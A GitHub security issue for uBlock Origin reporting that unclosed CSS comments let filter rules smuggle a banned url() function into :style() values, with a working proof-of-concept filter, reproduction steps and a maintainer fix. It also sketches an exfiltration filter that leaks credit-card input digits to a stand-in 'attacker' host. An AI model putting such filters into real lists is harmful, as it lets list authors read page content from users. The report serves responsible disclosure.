Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Security: comments can be used to smuggle url() functions into css values. #1693

Closed
8 tasks done
taviso opened this issue Aug 25, 2021 · 2 comments
Closed
8 tasks done

Security: comments can be used to smuggle url() functions into css values. #1693

taviso opened this issue Aug 25, 2021 · 2 comments
Labels
fixed issue has been addressed

Comments

@taviso
Copy link

taviso commented Aug 25, 2021

Prerequisites

I tried to reproduce the issue when...

  • uBO is the only extension
  • uBO with default lists/settings
  • using a new, unmodified browser profile

Description

If I understand the filter security model correctly, third party filter lists are trusted to hide content, but are not permitted to modify or read page content. For this reason, the css url() function is not permitted in any :style() rules, because that could be used to modify and/or exfiltrate content.

I guess the obvious way to exfiltrate content would be to auto-generate a ton of input.creditcard:has-text(/^0/):style(background-image: url(http://attacker/?matched=0) filters, but I guess you already realized this and that's why you ban url() 😃

Anyway, I think I've found a way to get a url() past the parser, it doesn't check if comments are closed in variables, so this filter:

example.com##div:style(--foo: 1/*)
example.com##div[bar="*/;background-image: url(https://google.com);}/*"]

Generates this CSS:

div
{--foo: 1/*}

.div-gpt-ad
{width:1px!important;height:1px!important;min-height:1px!important;}

div[bar="*/;background-image: url(https://google.com);}/*"],
[href^="http://www.FriendlyDuck.com/"],

A specific URL where the issue occurs

https://www.example.com/

Steps to Reproduce

  1. Create the following filter in My filters:
example.com##div:style(--foo: 1/*)
example.com##div[bar="*/;background-image: url(https://storage.googleapis.com/gd-wagtail-prod-assets/original_images/evolving_google_identity_3x2.jpg); background-size: cover;}/*"]

Visit this link, observe that there is an image background. I think this should be impossible.

Screenshot 2021-08-24 221513

Expected behavior

The css url() function is correctly banned.

Actual behavior

The parser is confused by unclosed comments.

uBlock Origin version

1.37.2

Browser name and version

Chrome 92

Operating System and version

Fedora 34
@uBlock-user uBlock-user added the something to address something to address label Aug 25, 2021
gorhill added a commit to gorhill/uBlock that referenced this issue Aug 25, 2021
@gorhill
Forbid instances of /* in :style() operator
a2d8545 
Related issue:
- uBlockOrigin/uBlock-issues#1693
@uBlock-user uBlock-user added fixed issue has been addressed and removed something to address something to address labels Aug 25, 2021
@josefhuelk

This comment has been minimized.

Sign in to view
@gorhill

This comment has been minimized.

Sign in to view
@uBlockOrigin uBlockOrigin locked as off-topic and limited conversation to collaborators Sep 11, 2021
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
fixed issue has been addressed
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@taviso @gorhill @uBlock-user @josefhuelk